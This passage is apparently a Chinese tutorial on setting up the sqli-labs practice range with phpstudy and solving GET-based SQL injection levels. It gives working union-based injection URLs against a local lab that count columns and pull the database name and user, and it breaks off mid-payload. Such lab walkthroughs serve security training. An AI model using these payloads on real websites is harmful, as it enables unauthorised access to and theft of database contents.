靶场搭建与1-10GET型注入实战
目录
环境准备
下载phpstudy
小皮面板(phpstudy) - 让天下没有难配的服务器环境!
下载sqli-labs靶场环境
GitHub - Audi-1/sqli-labs: SQLI labs to test error based, Blind boolean based, Time based.
运行phpstudy环境,开启apache和mysql
将php环境改为5版本,因为7版本删除了一些函数,靶场环境不能正常连接
靶场环境初始化
将sqli靶场解压之后房子phpstudy的www目录下,访问127.0.0.1/sql
点击Setup/reset Database for labs 进行靶场环境初始化
初始化之后即可正常进行靶场测试了。
Less-1
‘单引号注入
判断查询列数
http://127.0.0.1/sql/Less-1/?id=1' order by 4 -- - 报错
http://127.0.0.1/sql/Less-1/?id=1' order by 3 -- - 正常
说明查询列数为3
判断显示位
http://127.0.0.1/sql/Less-1/?id=-1' union select 1,2,3 -- - 确认显示位为2和3
数据库名和数据库用户
http://127.0.0.1/sql/Less-1/?id=-1' union select 1,database(),user() -- - security和root@localhost
表名
http://127.0.0.1/sql/Less-1/?id=-1' union sele